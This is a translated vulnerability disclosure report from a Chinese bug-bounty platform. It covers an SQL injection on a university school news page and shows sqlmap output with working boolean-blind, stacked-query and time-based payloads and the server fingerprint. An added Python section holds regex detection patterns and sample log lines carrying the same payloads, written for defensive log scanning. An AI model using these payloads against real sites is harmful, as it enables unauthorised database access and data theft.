Vulnerability summary
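Vulnerability title: An injection vulnerability at a school of the University of International Business and Economics, leaking the whole site's data
Submitted: 2016-01-11 19:43
Fixed: 2016-02-22 16:48
Published: 2016-02-22 16:48
Vulnerability type: SQL injection
Severity: High
Self-assessed Rank: 10
Vulnerability status: Handed over to a third-party partner organization (CCERT, the education network emergency response team) for handling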
Tags: none
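Vulnerability details
Disclosure status:
2016-01-11: Details reported to the vendor, awaiting vendor handling
2016-01-12: Vendor has confirmed; details disclosed to the vendor only
2016-01-22: Details disclosed to core white hats and experts in related fields
2016-02-01: Details disclosed to regular white hats
2016-02-11: Details disclosed to trainee white hats
2016-02-22: Details disclosed to the public
Brief description: The University of International Business and Economics, known in Chinese by the short names "对外经贸大学" and "贸大" and in English as "UIBE", is located in Beijing, the capital of the People's Republic of China. The school began as the Senior Commercial Cadre School of the Ministry of Trade, founded in 1951; in 1954 it was merged to form the Beijing Institute of Foreign Trade, and in 1960 it was listed among the first 64 national key universities. From 1954 to 1960, our university was the only institution of higher education in New China approved to engage in international trade education.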
Detailed description:
Injection point: http://**.**.**.**/News/List_News.aspx?SystemName=SchoolNews*&TypeID=3

URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if ann
sqlmap identified the following injection points with a total of 45 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://**.**.**.**:80/News/List_News.aspx?SystemName=SchoolNews' AND 8794=8794 AND 'Cwrc'='Cwrc&TypeID=3

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: http://**.**.**.**:80/News/List_News.aspx?SystemName=SchoolNews'; WAITFOR DELAY '0:0:5'--&TypeID=3

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: http://**.**.**.**:80/News/List_News.aspx?SystemName=SchoolNews' WAITFOR DELAY '0:0:5'--&TypeID=3
---
[11:46:45] [INFO] testing Microsoft SQL Server
[11:46:47] [INFO] confirming Microsoft SQL Server
[11:47:06] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000

34 databases
Proof of vulnerability:
Injection point: http://**.**.**.**/News/List_News.aspx?SystemName=SchoolNews*&TypeID=3
Remediation:
Copyright notice: please credit the source when reposting: 路人甲 @乌云
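As an added example (not part of the original report), the following Python sketch scans IIS W3C logs for the three payload classes sqlmap reported against the SystemName parameter, and flags requests whose response time shows the injected delay actually ran. The log lines, client IPs and timings are constructed, and the function and rule names are hypothetical.

```python
import re
from urllib.parse import parse_qs

# Rules modelled on the three payload classes in the sqlmap output above.
DELAY = re.compile(r"'\s*;?\s*WAITFOR\s+DELAY\s+'(\d+):(\d+):(\d+)'", re.I)
RULES = [
    ("boolean-based blind", re.compile(r"'\s*(?:AND|OR)\s+\d+\s*=\s*\d+", re.I)),
    ("stacked queries", re.compile(r"'\s*;\s*\w+")),
    ("time-based blind", DELAY),
]

# Constructed IIS W3C log lines (documentation IPs, invented timings).
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status time-taken
2016-01-11 11:46:01 GET /News/List_News.aspx SystemName=SchoolNews&TypeID=3 192.0.2.10 200 31
2016-01-11 11:46:02 GET /News/List_News.aspx SystemName=SchoolNews%27%20AND%208794=8794%20AND%20%27Cwrc%27=%27Cwrc&TypeID=3 198.51.100.7 200 40
2016-01-11 11:46:03 GET /News/List_News.aspx SystemName=SchoolNews%27%3B%20WAITFOR%20DELAY%20%270:0:5%27--&TypeID=3 198.51.100.7 200 5042
2016-01-11 11:46:09 GET /News/List_News.aspx SystemName=SchoolNews%27%20WAITFOR%20DELAY%20%270:0:5%27--&TypeID=3 198.51.100.7 200 5038
""".splitlines()


def scan_iis_log(lines, param="SystemName"):
    """Return (client_ip, rule_names, delay_observed) per suspicious request."""
    fields, hits = [], []
    for line in lines:
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # column names for the rows that follow
            continue
        if line.startswith("#") or not line.strip():
            continue
        row = dict(zip(fields, line.split()))
        # parse_qs percent-decodes, so encoded quotes and spaces are normalised.
        query = row.get("cs-uri-query", "")
        values = parse_qs(query, keep_blank_values=True).get(param, [])
        names = sorted({n for v in values for n, rx in RULES if rx.search(v)})
        if not names:
            continue
        # A response at least as slow as the requested delay suggests the
        # injected WAITFOR ran on the database server.
        delay_observed = False
        for v in values:
            m = DELAY.search(v)
            if m and row.get("time-taken", "").isdigit():
                h, mi, s = map(int, m.groups())
                wanted_ms = (h * 3600 + mi * 60 + s) * 1000
                delay_observed |= int(row["time-taken"]) >= wanted_ms
        hits.append((row.get("c-ip"), names, delay_observed))
    return hits


if __name__ == "__main__":
    for hit in scan_iis_log(SAMPLE_LOG):
        print(hit)
```

A hit with `delay_observed` set to True is the one to escalate first: the payload was not only sent but appears to have executed.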
Vulnerability response
Vendor response:
Severity: Medium
Vulnerability Rank: 6
Confirmed: 2016-01-12 12:35
Vendor reply: Notified; being handled
Latest status: None yet